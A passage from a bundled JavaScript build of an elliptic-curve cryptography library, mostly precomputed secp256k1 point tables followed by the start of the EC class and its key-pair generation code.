                "146a778c04670c2f91b00af4680dfa8bce3490717d58ba889ddb5928366642be",
                "b318e0ec3354028add669827f9d4b2870aaa971d2f7e5ed1d0b297483d83efd0"
            ],
            [
                "fa50c0f61d22e5f07e3acebb1aa07b128d0012209a28b9776d76a8793180eef9",
                "6b84c6922397eba9b72cd2872281a68a5e683293a57a213b38cd8d7d3f4f2811"
            ],
            [
                "da1d61d0ca721a11b1a5bf6b7d88e8421a288ab5d5bba5220e53d32b5f067ec2",
                "8157f55a7c99306c79c0766161c91e2966a73899d279b48a655fba0f1ad836f1"
            ],
            [
                "a8e282ff0c9706907215ff98e8fd416615311de0446f1e062a73b0610d064e13",
                "7f97355b8db81c09abfb7f3c5b2515888b679a3e50dd6bd6cef7c73111f4cc0c"
            ],
            [
                "174a53b9c9a285872d39e56e6913cab15d59b1fa512508c022f382de8319497c",
                "ccc9dc37abfc9c1657b4155f2c47f9e6646b3a1d8cb9854383da13ac079afa73"
            ],
            [
                "959396981943785c3d3e57edf5018cdbe039e730e4918b3d884fdff09475b7ba",
                "2e7e552888c331dd8ba0386a4b9cd6849c653f64c8709385e9b8abf87524f2fd"
            ],
            [
                "d2a63a50ae401e56d645a1153b109a8fcca0a43d561fba2dbb51340c9d82b151",
                "e82d86fb6443fcb7565aee58b2948220a70f750af484ca52d4142174dcf89405"
            ],
            [
                "64587e2335471eb890ee7896d7cfdc866bacbdbd3839317b3436f9b45617e073",
                "d99fcdd5bf6902e2ae96dd6447c299a185b90a39133aeab358299e5e9faf6589"
            ],
            [
                "8481bde0e4e4d885b3a546d3e549de042f0aa6cea250e7fd358d6c86dd45e458",
                "38ee7b8cba5404dd84a25bf39cecb2ca900a79c42b262e556d64b1b59779057e"
            ],
            [
                "13464a57a78102aa62b6979ae817f4637ffcfed3c4b1ce30bcd6303f6caf666b",
                "69be159004614580ef7e433453ccb0ca48f300a81d0942e13f495a907f6ecc27"
            ],
            [
                "bc4a9df5b713fe2e9aef430bcc1dc97a0cd9ccede2f28588cada3a0d2d83f366",
                "d3a81ca6e785c06383937adf4b798caa6e8a9fbfa547b16d758d666581f33c1"
            ],
            [
                "8c28a97bf8298bc0d23d8c749452a32e694b65e30a9472a3954ab30fe5324caa",
                "40a30463a3305193378fedf31f7cc0eb7ae784f0451cb9459e71dc73cbef9482"
            ],
            [
                "8ea9666139527a8c1dd94ce4f071fd23c8b350c5a4bb33748c4ba111faccae0",
                "620efabbc8ee2782e24e7c0cfb95c5d735b783be9cf0f8e955af34a30e62b945"
            ],
            [
                "dd3625faef5ba06074669716bbd3788d89bdde815959968092f76cc4eb9a9787",
                "7a188fa3520e30d461da2501045731ca941461982883395937f68d00c644a573"
            ],
            [
                "f710d79d9eb962297e4f6232b40e8f7feb2bc63814614d692c12de752408221e",
                "ea98e67232d3b3295d3b535532115ccac8612c721851617526ae47a9c77bfc82"
            ]
        ]
    },
    naf: {
        wnd: 7,
        points: [
            [
                "f9308a019258c31049344f85f89d5229b531c845836f99b08601f113bce036f9",
                "388f7b0f632de8140fe337e62a37f3566500a99934c2231b6cb9fd7584b8e672"
            ],
            [
                "2f8bde4d1a07209355b4a7250a5c5128e88b84bddc619ab7cba8d569b240efe4",
                "d8ac222636e5e3d6d4dba9dda6c9c426f788271bab0d6840dca87d3aa6ac62d6"
            ],
            [
                "5cbdf0646e5db4eaa398f365f2ea7a0e3d419b7e0330e39ce92bddedcac4f9bc",
                "6aebca40ba255960a3178d6d861a54dba813d0b813fde7b5a5082628087264da"
            ],
            [
                "acd484e2f0c7f65309ad178a9f559abde09796974c57e714c35f110dfc27ccbe",
                "cc338921b0a7d9fd64380971763b61e9add888a4375f8e0f05cc262ac64f9c37"
            ],
            [
                "774ae7f858a9411e5ef4246b70c65aac5649980be5c17891bbec17895da008cb",
                "d984a032eb6b5e190243dd56d7b7b365372db1e2dff9d6a8301d74c9c953c61b"
            ],
            [
                "f28773c2d975288bc7d1d205c3748651b075fbc6610e58cddeeddf8f19405aa8",
                "ab0902e8d880a89758212eb65cdaf473a1a06da521fa91f29b5cb52db03ed81"
            ],
            [
                "d7924d4f7d43ea965a465ae3095ff41131e5946f3c85f79e44adbcf8e27e080e",
                "581e2872a86c72a683842ec228cc6defea40af2bd896d3a5c504dc9ff6a26b58"
            ],
            [
                "defdea4cdb677750a420fee807eacf21eb9898ae79b9768766e4faa04a2d4a34",
                "4211ab0694635168e997b0ead2a93daeced1f4a04a95c0f6cfb199f69e56eb77"
            ],
            [
                "2b4ea0a797a443d293ef5cff444f4979f06acfebd7e86d277475656138385b6c",
                "85e89bc037945d93b343083b5a1c86131a01f60c50269763b570c854e5c09b7a"
            ],
            [
                "352bbf4a4cdd12564f93fa332ce333301d9ad40271f8107181340aef25be59d5",
                "321eb4075348f534d59c18259dda3e1f4a1b3b2e71b1039c67bd3d8bcf81998c"
            ],
            [
                "2fa2104d6b38d11b0230010559879124e42ab8dfeff5ff29dc9cdadd4ecacc3f",
                "2de1068295dd865b64569335bd5dd80181d70ecfc882648423ba76b532b7d67"
            ],
            [
                "9248279b09b4d68dab21a9b066edda83263c3d84e09572e269ca0cd7f5453714",
                "73016f7bf234aade5d1aa71bdea2b1ff3fc0de2a887912ffe54a32ce97cb3402"
            ],
            [
                "daed4f2be3a8bf278e70132fb0beb7522f570e144bf615c07e996d443dee8729",
                "a69dce4a7d6c98e8d4a1aca87ef8d7003f83c230f3afa726ab40e52290be1c55"
            ],
            [
                "c44d12c7065d812e8acf28d7cbb19f9011ecd9e9fdf281b0e6a3b5e87d22e7db",
                "2119a460ce326cdc76c45926c982fdac0e106e861edf61c5a039063f0e0e6482"
            ],
            [
                "6a245bf6dc698504c89a20cfded60853152b695336c28063b61c65cbd269e6b4",
                "e022cf42c2bd4a708b3f5126f16a24ad8b33ba48d0423b6efd5e6348100d8a82"
            ],
            [
                "1697ffa6fd9de627c077e3d2fe541084ce13300b0bec1146f95ae57f0d0bd6a5",
                "b9c398f186806f5d27561506e4557433a2cf15009e498ae7adee9d63d01b2396"
            ],
            [
                "605bdb019981718b986d0f07e834cb0d9deb8360ffb7f61df982345ef27a7479",
                "2972d2de4f8d20681a78d93ec96fe23c26bfae84fb14db43b01e1e9056b8c49"
            ],
            [
                "62d14dab4150bf497402fdc45a215e10dcb01c354959b10cfe31c7e9d87ff33d",
                "80fc06bd8cc5b01098088a1950eed0db01aa132967ab472235f5642483b25eaf"
            ],
            [
                "80c60ad0040f27dade5b4b06c408e56b2c50e9f56b9b8b425e555c2f86308b6f",
                "1c38303f1cc5c30f26e66bad7fe72f70a65eed4cbe7024eb1aa01f56430bd57a"
            ],
            [
                "7a9375ad6167ad54aa74c6348cc54d344cc5dc9487d847049d5eabb0fa03c8fb",
                "d0e3fa9eca8726909559e0d79269046bdc59ea10c70ce2b02d499ec224dc7f7"
            ],
            [
                "d528ecd9b696b54c907a9ed045447a79bb408ec39b68df504bb51f459bc3ffc9",
                "eecf41253136e5f99966f21881fd656ebc4345405c520dbc063465b521409933"
            ],
            [
                "49370a4b5f43412ea25f514e8ecdad05266115e4a7ecb1387231808f8b45963",
                "758f3f41afd6ed428b3081b0512fd62a54c3f3afbb5b6764b653052a12949c9a"
            ],
            [
                "77f230936ee88cbbd73df930d64702ef881d811e0e1498e2f1c13eb1fc345d74",
                "958ef42a7886b6400a08266e9ba1b37896c95330d97077cbbe8eb3c7671c60d6"
            ],
            [
                "f2dac991cc4ce4b9ea44887e5c7c0bce58c80074ab9d4dbaeb28531b7739f530",
                "e0dedc9b3b2f8dad4da1f32dec2531df9eb5fbeb0598e4fd1a117dba703a3c37"
            ],
            [
                "463b3d9f662621fb1b4be8fbbe2520125a216cdfc9dae3debcba4850c690d45b",
                "5ed430d78c296c3543114306dd8622d7c622e27c970a1de31cb377b01af7307e"
            ],
            [
                "f16f804244e46e2a09232d4aff3b59976b98fac14328a2d1a32496b49998f247",
                "cedabd9b82203f7e13d206fcdf4e33d92a6c53c26e5cce26d6579962c4e31df6"
            ],
            [
                "caf754272dc84563b0352b7a14311af55d245315ace27c65369e15f7151d41d1",
                "cb474660ef35f5f2a41b643fa5e460575f4fa9b7962232a5c32f908318a04476"
            ],
            [
                "2600ca4b282cb986f85d0f1709979d8b44a09c07cb86d7c124497bc86f082120",
                "4119b88753c15bd6a693b03fcddbb45d5ac6be74ab5f0ef44b0be9475a7e4b40"
            ],
            [
                "7635ca72d7e8432c338ec53cd12220bc01c48685e24f7dc8c602a7746998e435",
                "91b649609489d613d1d5e590f78e6d74ecfc061d57048bad9e76f302c5b9c61"
            ],
            [
                "754e3239f325570cdbbf4a87deee8a66b7f2b33479d468fbc1a50743bf56cc18",
                "673fb86e5bda30fb3cd0ed304ea49a023ee33d0197a695d0c5d98093c536683"
            ],
            [
                "e3e6bd1071a1e96aff57859c82d570f0330800661d1c952f9fe2694691d9b9e8",
                "59c9e0bba394e76f40c0aa58379a3cb6a5a2283993e90c4167002af4920e37f5"
            ],
            [
                "186b483d056a033826ae73d88f732985c4ccb1f32ba35f4b4cc47fdcf04aa6eb",
                "3b952d32c67cf77e2e17446e204180ab21fb8090895138b4a4a797f86e80888b"
            ],
            [
                "df9d70a6b9876ce544c98561f4be4f725442e6d2b737d9c91a8321724ce0963f",
                "55eb2dafd84d6ccd5f862b785dc39d4ab157222720ef9da217b8c45cf2ba2417"
            ],
            [
                "5edd5cc23c51e87a497ca815d5dce0f8ab52554f849ed8995de64c5f34ce7143",
                "efae9c8dbc14130661e8cec030c89ad0c13c66c0d17a2905cdc706ab7399a868"
            ],
            [
                "290798c2b6476830da12fe02287e9e777aa3fba1c355b17a722d362f84614fba",
                "e38da76dcd440621988d00bcf79af25d5b29c094db2a23146d003afd41943e7a"
            ],
            [
                "af3c423a95d9f5b3054754efa150ac39cd29552fe360257362dfdecef4053b45",
                "f98a3fd831eb2b749a93b0e6f35cfb40c8cd5aa667a15581bc2feded498fd9c6"
            ],
            [
                "766dbb24d134e745cccaa28c99bf274906bb66b26dcf98df8d2fed50d884249a",
                "744b1152eacbe5e38dcc887980da38b897584a65fa06cedd2c924f97cbac5996"
            ],
            [
                "59dbf46f8c94759ba21277c33784f41645f7b44f6c596a58ce92e666191abe3e",
                "c534ad44175fbc300f4ea6ce648309a042ce739a7919798cd85e216c4a307f6e"
            ],
            [
                "f13ada95103c4537305e691e74e9a4a8dd647e711a95e73cb62dc6018cfd87b8",
                "e13817b44ee14de663bf4bc808341f326949e21a6a75c2570778419bdaf5733d"
            ],
            [
                "7754b4fa0e8aced06d4167a2c59cca4cda1869c06ebadfb6488550015a88522c",
                "30e93e864e669d82224b967c3020b8fa8d1e4e350b6cbcc537a48b57841163a2"
            ],
            [
                "948dcadf5990e048aa3874d46abef9d701858f95de8041d2a6828c99e2262519",
                "e491a42537f6e597d5d28a3224b1bc25df9154efbd2ef1d2cbba2cae5347d57e"
            ],
            [
                "7962414450c76c1689c7b48f8202ec37fb224cf5ac0bfa1570328a8a3d7c77ab",
                "100b610ec4ffb4760d5c1fc133ef6f6b12507a051f04ac5760afa5b29db83437"
            ],
            [
                "3514087834964b54b15b160644d915485a16977225b8847bb0dd085137ec47ca",
                "ef0afbb2056205448e1652c48e8127fc6039e77c15c2378b7e7d15a0de293311"
            ],
            [
                "d3cc30ad6b483e4bc79ce2c9dd8bc54993e947eb8df787b442943d3f7b527eaf",
                "8b378a22d827278d89c5e9be8f9508ae3c2ad46290358630afb34db04eede0a4"
            ],
            [
                "1624d84780732860ce1c78fcbfefe08b2b29823db913f6493975ba0ff4847610",
                "68651cf9b6da903e0914448c6cd9d4ca896878f5282be4c8cc06e2a404078575"
            ],
            [
                "733ce80da955a8a26902c95633e62a985192474b5af207da6df7b4fd5fc61cd4",
                "f5435a2bd2badf7d485a4d8b8db9fcce3e1ef8e0201e4578c54673bc1dc5ea1d"
            ],
            [
                "15d9441254945064cf1a1c33bbd3b49f8966c5092171e699ef258dfab81c045c",
                "d56eb30b69463e7234f5137b73b84177434800bacebfc685fc37bbe9efe4070d"
            ],
            [
                "a1d0fcf2ec9de675b612136e5ce70d271c21417c9d2b8aaaac138599d0717940",
                "edd77f50bcb5a3cab2e90737309667f2641462a54070f3d519212d39c197a629"
            ],
            [
                "e22fbe15c0af8ccc5780c0735f84dbe9a790badee8245c06c7ca37331cb36980",
                "a855babad5cd60c88b430a69f53a1a7a38289154964799be43d06d77d31da06"
            ],
            [
                "311091dd9860e8e20ee13473c1155f5f69635e394704eaa74009452246cfa9b3",
                "66db656f87d1f04fffd1f04788c06830871ec5a64feee685bd80f0b1286d8374"
            ],
            [
                "34c1fd04d301be89b31c0442d3e6ac24883928b45a9340781867d4232ec2dbdf",
                "9414685e97b1b5954bd46f730174136d57f1ceeb487443dc5321857ba73abee"
            ],
            [
                "f219ea5d6b54701c1c14de5b557eb42a8d13f3abbcd08affcc2a5e6b049b8d63",
                "4cb95957e83d40b0f73af4544cccf6b1f4b08d3c07b27fb8d8c2962a400766d1"
            ],
            [
                "d7b8740f74a8fbaab1f683db8f45de26543a5490bca627087236912469a0b448",
                "fa77968128d9c92ee1010f337ad4717eff15db5ed3c049b3411e0315eaa4593b"
            ],
            [
                "32d31c222f8f6f0ef86f7c98d3a3335ead5bcd32abdd94289fe4d3091aa824bf",
                "5f3032f5892156e39ccd3d7915b9e1da2e6dac9e6f26e961118d14b8462e1661"
            ],
            [
                "7461f371914ab32671045a155d9831ea8793d77cd59592c4340f86cbc18347b5",
                "8ec0ba238b96bec0cbdddcae0aa442542eee1ff50c986ea6b39847b3cc092ff6"
            ],
            [
                "ee079adb1df1860074356a25aa38206a6d716b2c3e67453d287698bad7b2b2d6",
                "8dc2412aafe3be5c4c5f37e0ecc5f9f6a446989af04c4e25ebaac479ec1c8c1e"
            ],
            [
                "16ec93e447ec83f0467b18302ee620f7e65de331874c9dc72bfd8616ba9da6b5",
                "5e4631150e62fb40d0e8c2a7ca5804a39d58186a50e497139626778e25b0674d"
            ],
            [
                "eaa5f980c245f6f038978290afa70b6bd8855897f98b6aa485b96065d537bd99",
                "f65f5d3e292c2e0819a528391c994624d784869d7e6ea67fb18041024edc07dc"
            ],
            [
                "78c9407544ac132692ee1910a02439958ae04877151342ea96c4b6b35a49f51",
                "f3e0319169eb9b85d5404795539a5e68fa1fbd583c064d2462b675f194a3ddb4"
            ],
            [
                "494f4be219a1a77016dcd838431aea0001cdc8ae7a6fc688726578d9702857a5",
                "42242a969283a5f339ba7f075e36ba2af925ce30d767ed6e55f4b031880d562c"
            ],
            [
                "a598a8030da6d86c6bc7f2f5144ea549d28211ea58faa70ebf4c1e665c1fe9b5",
                "204b5d6f84822c307e4b4a7140737aec23fc63b65b35f86a10026dbd2d864e6b"
            ],
            [
                "c41916365abb2b5d09192f5f2dbeafec208f020f12570a184dbadc3e58595997",
                "4f14351d0087efa49d245b328984989d5caf9450f34bfc0ed16e96b58fa9913"
            ],
            [
                "841d6063a586fa475a724604da03bc5b92a2e0d2e0a36acfe4c73a5514742881",
                "73867f59c0659e81904f9a1c7543698e62562d6744c169ce7a36de01a8d6154"
            ],
            [
                "5e95bb399a6971d376026947f89bde2f282b33810928be4ded112ac4d70e20d5",
                "39f23f366809085beebfc71181313775a99c9aed7d8ba38b161384c746012865"
            ],
            [
                "36e4641a53948fd476c39f8a99fd974e5ec07564b5315d8bf99471bca0ef2f66",
                "d2424b1b1abe4eb8164227b085c9aa9456ea13493fd563e06fd51cf5694c78fc"
            ],
            [
                "336581ea7bfbbb290c191a2f507a41cf5643842170e914faeab27c2c579f726",
                "ead12168595fe1be99252129b6e56b3391f7ab1410cd1e0ef3dcdcabd2fda224"
            ],
            [
                "8ab89816dadfd6b6a1f2634fcf00ec8403781025ed6890c4849742706bd43ede",
                "6fdcef09f2f6d0a044e654aef624136f503d459c3e89845858a47a9129cdd24e"
            ],
            [
                "1e33f1a746c9c5778133344d9299fcaa20b0938e8acff2544bb40284b8c5fb94",
                "60660257dd11b3aa9c8ed618d24edff2306d320f1d03010e33a7d2057f3b3b6"
            ],
            [
                "85b7c1dcb3cec1b7ee7f30ded79dd20a0ed1f4cc18cbcfcfa410361fd8f08f31",
                "3d98a9cdd026dd43f39048f25a8847f4fcafad1895d7a633c6fed3c35e999511"
            ],
            [
                "29df9fbd8d9e46509275f4b125d6d45d7fbe9a3b878a7af872a2800661ac5f51",
                "b4c4fe99c775a606e2d8862179139ffda61dc861c019e55cd2876eb2a27d84b"
            ],
            [
                "a0b1cae06b0a847a3fea6e671aaf8adfdfe58ca2f768105c8082b2e449fce252",
                "ae434102edde0958ec4b19d917a6a28e6b72da1834aff0e650f049503a296cf2"
            ],
            [
                "4e8ceafb9b3e9a136dc7ff67e840295b499dfb3b2133e4ba113f2e4c0e121e5",
                "cf2174118c8b6d7a4b48f6d534ce5c79422c086a63460502b827ce62a326683c"
            ],
            [
                "d24a44e047e19b6f5afb81c7ca2f69080a5076689a010919f42725c2b789a33b",
                "6fb8d5591b466f8fc63db50f1c0f1c69013f996887b8244d2cdec417afea8fa3"
            ],
            [
                "ea01606a7a6c9cdd249fdfcfacb99584001edd28abbab77b5104e98e8e3b35d4",
                "322af4908c7312b0cfbfe369f7a7b3cdb7d4494bc2823700cfd652188a3ea98d"
            ],
            [
                "af8addbf2b661c8a6c6328655eb96651252007d8c5ea31be4ad196de8ce2131f",
                "6749e67c029b85f52a034eafd096836b2520818680e26ac8f3dfbcdb71749700"
            ],
            [
                "e3ae1974566ca06cc516d47e0fb165a674a3dabcfca15e722f0e3450f45889",
                "2aeabe7e4531510116217f07bf4d07300de97e4874f81f533420a72eeb0bd6a4"
            ],
            [
                "591ee355313d99721cf6993ffed1e3e301993ff3ed258802075ea8ced397e246",
                "b0ea558a113c30bea60fc4775460c7901ff0b053d25ca2bdeee98f1a4be5d196"
            ],
            [
                "11396d55fda54c49f19aa97318d8da61fa8584e47b084945077cf03255b52984",
                "998c74a8cd45ac01289d5833a7beb4744ff536b01b257be4c5767bea93ea57a4"
            ],
            [
                "3c5d2a1ba39c5a1790000738c9e0c40b8dcdfd5468754b6405540157e017aa7a",
                "b2284279995a34e2f9d4de7396fc18b80f9b8b9fdd270f6661f79ca4c81bd257"
            ],
            [
                "cc8704b8a60a0defa3a99a7299f2e9c3fbc395afb04ac078425ef8a1793cc030",
                "bdd46039feed17881d1e0862db347f8cf395b74fc4bcdc4e940b74e3ac1f1b13"
            ],
            [
                "c533e4f7ea8555aacd9777ac5cad29b97dd4defccc53ee7ea204119b2889b197",
                "6f0a256bc5efdf429a2fb6242f1a43a2d9b925bb4a4b3a26bb8e0f45eb596096"
            ],
            [
                "c14f8f2ccb27d6f109f6d08d03cc96a69ba8c34eec07bbcf566d48e33da6593",
                "c359d6923bb398f7fd4473e16fe1c28475b740dd098075e6c0e8649113dc3a38"
            ],
            [
                "a6cbc3046bc6a450bac24789fa17115a4c9739ed75f8f21ce441f72e0b90e6ef",
                "21ae7f4680e889bb130619e2c0f95a360ceb573c70603139862afd617fa9b9f"
            ],
            [
                "347d6d9a02c48927ebfb86c1359b1caf130a3c0267d11ce6344b39f99d43cc38",
                "60ea7f61a353524d1c987f6ecec92f086d565ab687870cb12689ff1e31c74448"
            ],
            [
                "da6545d2181db8d983f7dcb375ef5866d47c67b1bf31c8cf855ef7437b72656a",
                "49b96715ab6878a79e78f07ce5680c5d6673051b4935bd897fea824b77dc208a"
            ],
            [
                "c40747cc9d012cb1a13b8148309c6de7ec25d6945d657146b9d5994b8feb1111",
                "5ca560753be2a12fc6de6caf2cb489565db936156b9514e1bb5e83037e0fa2d4"
            ],
            [
                "4e42c8ec82c99798ccf3a610be870e78338c7f713348bd34c8203ef4037f3502",
                "7571d74ee5e0fb92a7a8b33a07783341a5492144cc54bcc40a94473693606437"
            ],
            [
                "3775ab7089bc6af823aba2e1af70b236d251cadb0c86743287522a1b3b0dedea",
                "be52d107bcfa09d8bcb9736a828cfa7fac8db17bf7a76a2c42ad961409018cf7"
            ],
            [
                "cee31cbf7e34ec379d94fb814d3d775ad954595d1314ba8846959e3e82f74e26",
                "8fd64a14c06b589c26b947ae2bcf6bfa0149ef0be14ed4d80f448a01c43b1c6d"
            ],
            [
                "b4f9eaea09b6917619f6ea6a4eb5464efddb58fd45b1ebefcdc1a01d08b47986",
                "39e5c9925b5a54b07433a4f18c61726f8bb131c012ca542eb24a8ac07200682a"
            ],
            [
                "d4263dfc3d2df923a0179a48966d30ce84e2515afc3dccc1b77907792ebcc60e",
                "62dfaf07a0f78feb30e30d6295853ce189e127760ad6cf7fae164e122a208d54"
            ],
            [
                "48457524820fa65a4f8d35eb6930857c0032acc0a4a2de422233eeda897612c4",
                "25a748ab367979d98733c38a1fa1c2e7dc6cc07db2d60a9ae7a76aaa49bd0f77"
            ],
            [
                "dfeeef1881101f2cb11644f3a2afdfc2045e19919152923f367a1767c11cceda",
                "ecfb7056cf1de042f9420bab396793c0c390bde74b4bbdff16a83ae09a9a7517"
            ],
            [
                "6d7ef6b17543f8373c573f44e1f389835d89bcbc6062ced36c82df83b8fae859",
                "cd450ec335438986dfefa10c57fea9bcc521a0959b2d80bbf74b190dca712d10"
            ],
            [
                "e75605d59102a5a2684500d3b991f2e3f3c88b93225547035af25af66e04541f",
                "f5c54754a8f71ee540b9b48728473e314f729ac5308b06938360990e2bfad125"
            ],
            [
                "eb98660f4c4dfaa06a2be453d5020bc99a0c2e60abe388457dd43fefb1ed620c",
                "6cb9a8876d9cb8520609af3add26cd20a0a7cd8a9411131ce85f44100099223e"
            ],
            [
                "13e87b027d8514d35939f2e6892b19922154596941888336dc3563e3b8dba942",
                "fef5a3c68059a6dec5d624114bf1e91aac2b9da568d6abeb2570d55646b8adf1"
            ],
            [
                "ee163026e9fd6fe017c38f06a5be6fc125424b371ce2708e7bf4491691e5764a",
                "1acb250f255dd61c43d94ccc670d0f58f49ae3fa15b96623e5430da0ad6c62b2"
            ],
            [
                "b268f5ef9ad51e4d78de3a750c2dc89b1e626d43505867999932e5db33af3d80",
                "5f310d4b3c99b9ebb19f77d41c1dee018cf0d34fd4191614003e945a1216e423"
            ],
            [
                "ff07f3118a9df035e9fad85eb6c7bfe42b02f01ca99ceea3bf7ffdba93c4750d",
                "438136d603e858a3a5c440c38eccbaddc1d2942114e2eddd4740d098ced1f0d8"
            ],
            [
                "8d8b9855c7c052a34146fd20ffb658bea4b9f69e0d825ebec16e8c3ce2b526a1",
                "cdb559eedc2d79f926baf44fb84ea4d44bcf50fee51d7ceb30e2e7f463036758"
            ],
            [
                "52db0b5384dfbf05bfa9d472d7ae26dfe4b851ceca91b1eba54263180da32b63",
                "c3b997d050ee5d423ebaf66a6db9f57b3180c902875679de924b69d84a7b375"
            ],
            [
                "e62f9490d3d51da6395efd24e80919cc7d0f29c3f3fa48c6fff543becbd43352",
                "6d89ad7ba4876b0b22c2ca280c682862f342c8591f1daf5170e07bfd9ccafa7d"
            ],
            [
                "7f30ea2476b399b4957509c88f77d0191afa2ff5cb7b14fd6d8e7d65aaab1193",
                "ca5ef7d4b231c94c3b15389a5f6311e9daff7bb67b103e9880ef4bff637acaec"
            ],
            [
                "5098ff1e1d9f14fb46a210fada6c903fef0fb7b4a1dd1d9ac60a0361800b7a00",
                "9731141d81fc8f8084d37c6e7542006b3ee1b40d60dfe5362a5b132fd17ddc0"
            ],
            [
                "32b78c7de9ee512a72895be6b9cbefa6e2f3c4ccce445c96b9f2c81e2778ad58",
                "ee1849f513df71e32efc3896ee28260c73bb80547ae2275ba497237794c8753c"
            ],
            [
                "e2cb74fddc8e9fbcd076eef2a7c72b0ce37d50f08269dfc074b581550547a4f7",
                "d3aa2ed71c9dd2247a62df062736eb0baddea9e36122d2be8641abcb005cc4a4"
            ],
            [
                "8438447566d4d7bedadc299496ab357426009a35f235cb141be0d99cd10ae3a8",
                "c4e1020916980a4da5d01ac5e6ad330734ef0d7906631c4f2390426b2edd791f"
            ],
            [
                "4162d488b89402039b584c6fc6c308870587d9c46f660b878ab65c82c711d67e",
                "67163e903236289f776f22c25fb8a3afc1732f2b84b4e95dbda47ae5a0852649"
            ],
            [
                "3fad3fa84caf0f34f0f89bfd2dcf54fc175d767aec3e50684f3ba4a4bf5f683d",
                "cd1bc7cb6cc407bb2f0ca647c718a730cf71872e7d0d2a53fa20efcdfe61826"
            ],
            [
                "674f2600a3007a00568c1a7ce05d0816c1fb84bf1370798f1c69532faeb1a86b",
                "299d21f9413f33b3edf43b257004580b70db57da0b182259e09eecc69e0d38a5"
            ],
            [
                "d32f4da54ade74abb81b815ad1fb3b263d82d6c692714bcff87d29bd5ee9f08f",
                "f9429e738b8e53b968e99016c059707782e14f4535359d582fc416910b3eea87"
            ],
            [
                "30e4e670435385556e593657135845d36fbb6931f72b08cb1ed954f1e3ce3ff6",
                "462f9bce619898638499350113bbc9b10a878d35da70740dc695a559eb88db7b"
            ],
            [
                "be2062003c51cc3004682904330e4dee7f3dcd10b01e580bf1971b04d4cad297",
                "62188bc49d61e5428573d48a74e1c655b1c61090905682a0d5558ed72dccb9bc"
            ],
            [
                "93144423ace3451ed29e0fb9ac2af211cb6e84a601df5993c419859fff5df04a",
                "7c10dfb164c3425f5c71a3f9d7992038f1065224f72bb9d1d902a6d13037b47c"
            ],
            [
                "b015f8044f5fcbdcf21ca26d6c34fb8197829205c7b7d2a7cb66418c157b112c",
                "ab8c1e086d04e813744a655b2df8d5f83b3cdc6faa3088c1d3aea1454e3a1d5f"
            ],
            [
                "d5e9e1da649d97d89e4868117a465a3a4f8a18de57a140d36b3f2af341a21b52",
                "4cb04437f391ed73111a13cc1d4dd0db1693465c2240480d8955e8592f27447a"
            ],
            [
                "d3ae41047dd7ca065dbf8ed77b992439983005cd72e16d6f996a5316d36966bb",
                "bd1aeb21ad22ebb22a10f0303417c6d964f8cdd7df0aca614b10dc14d125ac46"
            ],
            [
                "463e2763d885f958fc66cdd22800f0a487197d0a82e377b49f80af87c897b065",
                "bfefacdb0e5d0fd7df3a311a94de062b26b80c61fbc97508b79992671ef7ca7f"
            ],
            [
                "7985fdfd127c0567c6f53ec1bb63ec3158e597c40bfe747c83cddfc910641917",
                "603c12daf3d9862ef2b25fe1de289aed24ed291e0ec6708703a5bd567f32ed03"
            ],
            [
                "74a1ad6b5f76e39db2dd249410eac7f99e74c59cb83d2d0ed5ff1543da7703e9",
                "cc6157ef18c9c63cd6193d83631bbea0093e0968942e8c33d5737fd790e0db08"
            ],
            [
                "30682a50703375f602d416664ba19b7fc9bab42c72747463a71d0896b22f6da3",
                "553e04f6b018b4fa6c8f39e7f311d3176290d0e0f19ca73f17714d9977a22ff8"
            ],
            [
                "9e2158f0d7c0d5f26c3791efefa79597654e7a2b2464f52b1ee6c1347769ef57",
                "712fcdd1b9053f09003a3481fa7762e9ffd7c8ef35a38509e2fbf2629008373"
            ],
            [
                "176e26989a43c9cfeba4029c202538c28172e566e3c4fce7322857f3be327d66",
                "ed8cc9d04b29eb877d270b4878dc43c19aefd31f4eee09ee7b47834c1fa4b1c3"
            ],
            [
                "75d46efea3771e6e68abb89a13ad747ecf1892393dfc4f1b7004788c50374da8",
                "9852390a99507679fd0b86fd2b39a868d7efc22151346e1a3ca4726586a6bed8"
            ],
            [
                "809a20c67d64900ffb698c4c825f6d5f2310fb0451c869345b7319f645605721",
                "9e994980d9917e22b76b061927fa04143d096ccc54963e6a5ebfa5f3f8e286c1"
            ],
            [
                "1b38903a43f7f114ed4500b4eac7083fdefece1cf29c63528d563446f972c180",
                "4036edc931a60ae889353f77fd53de4a2708b26b6f5da72ad3394119daf408f9"
            ]
        ]
    }
};

});


parcelRequire.register("220Zx", function(module, exports) {
"use strict";

var $jX0xT = parcelRequire("jX0xT");

var $kKonu = parcelRequire("kKonu");

var $gEVtY = parcelRequire("gEVtY");

var $fbTbW = parcelRequire("fbTbW");

var $7JHF0 = parcelRequire("7JHF0");
var $17ac898fe5b06379$var$assert = $gEVtY.assert;

var $lPqzs = parcelRequire("lPqzs");

var $i46nc = parcelRequire("i46nc");
function $17ac898fe5b06379$var$EC(options) {
    if (!(this instanceof $17ac898fe5b06379$var$EC)) return new $17ac898fe5b06379$var$EC(options);
    // Shortcut `elliptic.ec(curve-name)`
    if (typeof options === "string") {
        $17ac898fe5b06379$var$assert(Object.prototype.hasOwnProperty.call($fbTbW, options), "Unknown curve " + options);
        options = $fbTbW[options];
    }
    // Shortcut for `elliptic.ec(elliptic.curves.curveName)`
    if (options instanceof $fbTbW.PresetCurve) options = {
        curve: options
    };
    this.curve = options.curve.curve;
    this.n = this.curve.n;
    this.nh = this.n.ushrn(1);
    this.g = this.curve.g;
    // Point on curve
    this.g = options.curve.g;
    this.g.precompute(options.curve.n.bitLength() + 1);
    // Hash for function for DRBG
    this.hash = options.hash || options.curve.hash;
}
module.exports = $17ac898fe5b06379$var$EC;
$17ac898fe5b06379$var$EC.prototype.keyPair = function keyPair(options) {
    return new $lPqzs(this, options);
};
$17ac898fe5b06379$var$EC.prototype.keyFromPrivate = function keyFromPrivate(priv, enc) {
    return $lPqzs.fromPrivate(this, priv, enc);
};
$17ac898fe5b06379$var$EC.prototype.keyFromPublic = function keyFromPublic(pub, enc) {
    return $lPqzs.fromPublic(this, pub, enc);
};
$17ac898fe5b06379$var$EC.prototype.genKeyPair = function genKeyPair(options) {
    if (!options) options = {};
    // Instantiate Hmac_DRBG
    var drbg = new $kKonu({
        hash: this.hash,
        pers: options.pers,
        persEnc: options.persEnc || "utf8",
        entropy: options.entropy || $7JHF0(this.hash.hmacStrength),
        entropyEnc: options.entropy && options.entropyEnc || "utf8",
        nonce: this.n.toArray()
    });
    var bytes = this.n.byteLength();
    var ns2 = this.n.sub(new $jX0xT(2));
    for(;;){
        var priv = new $jX0xT(drbg.generate(bytes));
